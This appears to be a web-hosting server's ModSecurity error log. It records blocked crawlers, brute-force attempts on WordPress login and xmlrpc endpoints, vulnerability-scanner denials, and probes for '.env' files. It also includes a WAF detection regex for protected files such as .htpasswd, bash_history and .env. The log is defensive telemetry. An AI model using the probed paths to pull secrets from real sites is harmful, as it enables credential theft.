[Tue May 26 13:26:10.709112 2026] [security2:error] [pid 512745:tid 512979] [client 114.119.146.158:31293] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahVSGnKSB_s2CvZg7xNevwAAAXI"], referer: http://newdental.com.co?ucci/4961353900045308l13a/fdadfg17127f.hulloa
[Tue May 26 13:26:11.693860 2026] [security2:error] [pid 512745:tid 512913] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSGnKSB_s2CvZg7xNexAAAATA"]
[Tue May 26 13:26:12.148614 2026] [security2:error] [pid 512344:tid 512439] [remote 172.236.172.195:58752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVSG8bElyei4S77DQf4BwAALF4"]
[Tue May 26 13:26:13.605291 2026] [security2:error] [pid 512745:tid 512799] [remote 199.247.4.24:57234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVSHXKSB_s2CvZg7xNe3gABNDU"]
[Tue May 26 13:26:13.851402 2026] [security2:error] [pid 512745:tid 512986] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSHXKSB_s2CvZg7xNe3QAAAXk"]
[Tue May 26 13:26:15.449006 2026] [security2:error] [pid 512344:tid 512440] [remote 74.7.241.58:52440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVSH8bElyei4S77DQf4SAAAUl8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:26:16.020981 2026] [security2:error] [pid 512344:tid 512548] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSH8bElyei4S77DQf4TgAAAEo"]
[Tue May 26 13:26:18.832576 2026] [security2:error] [pid 512745:tid 512904] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSInKSB_s2CvZg7xNfGgAAASc"]
[Tue May 26 13:26:19.179567 2026] [security2:error] [pid 512745:tid 512964] [client 61.5.147.230:49224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVSInKSB_s2CvZg7xNfIQABYz8"], referer: https://panda-eco.com
[Tue May 26 13:26:20.911252 2026] [security2:error] [pid 512344:tid 512534] [client 85.208.96.196:37530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-10-26/"] [unique_id "ahVSJMbElyei4S77DQf4sgAAADw"]
[Tue May 26 13:26:20.911418 2026] [security2:error] [pid 512344:tid 512534] [client 85.208.96.196:37530] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-10-26/"] [unique_id "ahVSJMbElyei4S77DQf4sgAAADw"]
[Tue May 26 13:26:21.905144 2026] [security2:error] [pid 512745:tid 512993] [client 95.70.131.179:63068] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVSJXKSB_s2CvZg7xNfQQAAAYA"]
[Tue May 26 13:26:22.535045 2026] [security2:error] [pid 512745:tid 512839] [remote 173.249.21.166:35412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVSJnKSB_s2CvZg7xNfUgABQl0"]
[Tue May 26 13:26:22.975527 2026] [autoindex:error] [pid 512344:tid 512370] [remote 45.148.10.5:6078] AH01276: Cannot serve directory /home2/ucdccoin/omr.ucdc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:26:23.441459 2026] [security2:error] [pid 512745:tid 512904] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSJ3KSB_s2CvZg7xNfXQAAASc"]
[Tue May 26 13:26:24.984559 2026] [security2:error] [pid 512745:tid 512984] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSKHKSB_s2CvZg7xNfcQAAAXc"]
[Tue May 26 13:26:26.926977 2026] [security2:error] [pid 512344:tid 512573] [client 106.195.94.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSKsbElyei4S77DQf5BgAAAGM"]
[Tue May 26 13:26:27.543187 2026] [autoindex:error] [pid 512344:tid 512506] [client 45.148.10.5:41922] AH01276: Cannot serve directory /home2/ucdccoin/omr.ucdc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:26:28.040750 2026] [security2:error] [pid 512745:tid 512925] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSK3KSB_s2CvZg7xNfewAAATw"]
[Tue May 26 13:26:30.137479 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSLXKSB_s2CvZg7xNflAAAAWs"]
[Tue May 26 13:26:32.387503 2026] [security2:error] [pid 512745:tid 512894] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSL3KSB_s2CvZg7xNfuQAAAR0"]
[Tue May 26 13:26:33.969988 2026] [security2:error] [pid 512745:tid 512906] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSMXKSB_s2CvZg7xNf1QAAASk"]
[Tue May 26 13:26:36.452350 2026] [security2:error] [pid 512344:tid 512525] [client 74.7.244.13:42356] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ushaprec.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVSNMbElyei4S77DQf5dQAAM0U"]
[Tue May 26 13:26:36.500331 2026] [security2:error] [pid 512745:tid 512884] [client 60.52.41.82:59649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.41.52.60.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVSNHKSB_s2CvZg7xNf-AAAARM"]
[Tue May 26 13:26:36.500515 2026] [security2:error] [pid 512745:tid 512884] [client 60.52.41.82:59649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVSNHKSB_s2CvZg7xNf-AAAARM"]
[Tue May 26 13:26:36.728410 2026] [security2:error] [pid 512745:tid 512915] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSNHKSB_s2CvZg7xNf-wAAATI"]
[Tue May 26 13:26:36.812106 2026] [autoindex:error] [pid 512344:tid 512404] [remote 74.7.241.42:45146] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:26:39.128228 2026] [security2:error] [pid 512344:tid 512551] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSNsbElyei4S77DQf5pgAAAE0"]
[Tue May 26 13:26:40.784240 2026] [security2:error] [pid 512745:tid 512904] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSOHKSB_s2CvZg7xNgHgAAASc"]
[Tue May 26 13:26:43.689463 2026] [security2:error] [pid 512745:tid 512896] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSO3KSB_s2CvZg7xNgTAAAAR8"]
[Tue May 26 13:26:44.803778 2026] [security2:error] [pid 512344:tid 512513] [client 47.128.18.181:58994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahVSPMbElyei4S77DQf59wAAACc"]
[Tue May 26 13:26:45.364141 2026] [security2:error] [pid 512344:tid 512520] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSPMbElyei4S77DQf5-gAAAC4"]
[Tue May 26 13:26:45.699227 2026] [security2:error] [pid 512344:tid 512559] [client 88.99.80.227:35876] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVSPcbElyei4S77DQf6EQAAAFU"], referer: https://thegoodsporting.com
[Tue May 26 13:26:48.075848 2026] [security2:error] [pid 512344:tid 512543] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSP8bElyei4S77DQf6NwAAAEU"]
[Tue May 26 13:26:49.511231 2026] [security2:error] [pid 512745:tid 512909] [client 196.51.160.217:57093] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVSQXKSB_s2CvZg7xNgdgAAASw"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 13:26:50.975068 2026] [security2:error] [pid 512745:tid 512886] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSQnKSB_s2CvZg7xNgjgAAARU"]
[Tue May 26 13:26:51.129381 2026] [security2:error] [pid 512344:tid 512502] [client 202.185.215.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSQ8bElyei4S77DQf6agAAABw"], referer: https://www.anujtradingco.com/
[Tue May 26 13:26:52.036099 2026] [security2:error] [pid 512745:tid 512964] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSQ3KSB_s2CvZg7xNgogAAAWM"]
[Tue May 26 13:26:52.641985 2026] [security2:error] [pid 512745:tid 512921] [client 202.185.215.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSRHKSB_s2CvZg7xNgrgAAATg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1431426&moderation-hash=1e747c409850b73d8430cd58dafc9cc5
[Tue May 26 13:26:54.383540 2026] [security2:error] [pid 512344:tid 512495] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSRcbElyei4S77DQf6jAAAABU"]
[Tue May 26 13:26:55.500652 2026] [security2:error] [pid 512344:tid 512481] [client 123.16.157.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSR8bElyei4S77DQf6owAAAAc"]
[Tue May 26 13:26:56.953849 2026] [security2:error] [pid 512745:tid 512882] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSSHKSB_s2CvZg7xNg8QAAARE"]
[Tue May 26 13:26:59.389518 2026] [security2:error] [pid 512745:tid 512955] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSSnKSB_s2CvZg7xNhGQAAAVo"]
[Tue May 26 13:27:01.107015 2026] [security2:error] [pid 512745:tid 512901] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "tedxnutm.org.ng"] [uri "/index.php"] [unique_id "ahVSTHKSB_s2CvZg7xNhJwAAASQ"]
[Tue May 26 13:27:01.486705 2026] [security2:error] [pid 512745:tid 512986] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSTHKSB_s2CvZg7xNhNgAAAXk"]
[Tue May 26 13:27:03.760039 2026] [security2:error] [pid 512745:tid 512983] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVST3KSB_s2CvZg7xNhZwAAAXY"]
[Tue May 26 13:27:06.143953 2026] [security2:error] [pid 512745:tid 512884] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSUXKSB_s2CvZg7xNhggAAARM"]
[Tue May 26 13:27:07.758379 2026] [security2:error] [pid 512745:tid 512912] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSU3KSB_s2CvZg7xNhlAAAAS8"]
[Tue May 26 13:27:10.530047 2026] [security2:error] [pid 512745:tid 512935] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSVnKSB_s2CvZg7xNh9AAAAUY"]
[Tue May 26 13:27:11.530468 2026] [security2:error] [pid 512745:tid 512910] [client 95.70.131.179:62957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSVnKSB_s2CvZg7xNh_QAAAS0"]
[Tue May 26 13:27:11.722180 2026] [security2:error] [pid 512344:tid 512574] [client 62.60.130.233:59160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "gulfviewcreations.ca.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVSV8bElyei4S77DQf7VQAAAGQ"], referer: https://www.reddit.com/
[Tue May 26 13:27:12.060994 2026] [security2:error] [pid 512745:tid 512928] [client 62.60.130.233:63534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "gulfviewcreations.ca.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVSWHKSB_s2CvZg7xNiDAAAAT8"], referer: https://wordpress.org/
[Tue May 26 13:27:12.485307 2026] [security2:error] [pid 512745:tid 512918] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSWHKSB_s2CvZg7xNiDgAAATU"]
[Tue May 26 13:27:13.197855 2026] [security2:error] [pid 512344:tid 512593] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVSWcbElyei4S77DQf7bQAAAHc"]
[Tue May 26 13:27:13.198362 2026] [security2:error] [pid 512344:tid 512539] [client 66.249.64.96:58217] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVSWcbElyei4S77DQf7agAAAEE"]
[Tue May 26 13:27:13.420031 2026] [security2:error] [pid 512745:tid 512947] [client 4.201.75.230:13897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.samayikprasanga.in"] [uri "/wk/index.php"] [unique_id "ahVSWXKSB_s2CvZg7xNiIQAAAVI"]
[Tue May 26 13:27:13.477984 2026] [security2:error] [pid 512745:tid 512959] [client 5.255.118.168:36614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVSWXKSB_s2CvZg7xNiIwAAAV4"]
[Tue May 26 13:27:13.868700 2026] [security2:error] [pid 512745:tid 512961] [client 122.63.71.180:49125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.71.63.122.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kineticinfraprojects.com"] [uri "/xmlrpc.php"] [unique_id "ahVSWXKSB_s2CvZg7xNiJAAAAWA"]
[Tue May 26 13:27:13.868850 2026] [security2:error] [pid 512745:tid 512961] [client 122.63.71.180:49125] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kineticinfraprojects.com"] [uri "/xmlrpc.php"] [unique_id "ahVSWXKSB_s2CvZg7xNiJAAAAWA"]
[Tue May 26 13:27:14.280920 2026] [security2:error] [pid 512745:tid 512887] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSWXKSB_s2CvZg7xNiLgAAARY"]
[Tue May 26 13:27:14.292567 2026] [security2:error] [pid 512344:tid 512485] [client 5.255.118.168:36624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahVSWsbElyei4S77DQf7egAAAAs"]
[Tue May 26 13:27:14.341674 2026] [security2:error] [pid 512344:tid 512536] [client 5.255.118.168:36632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahVSWsbElyei4S77DQf7fgAAAD4"]
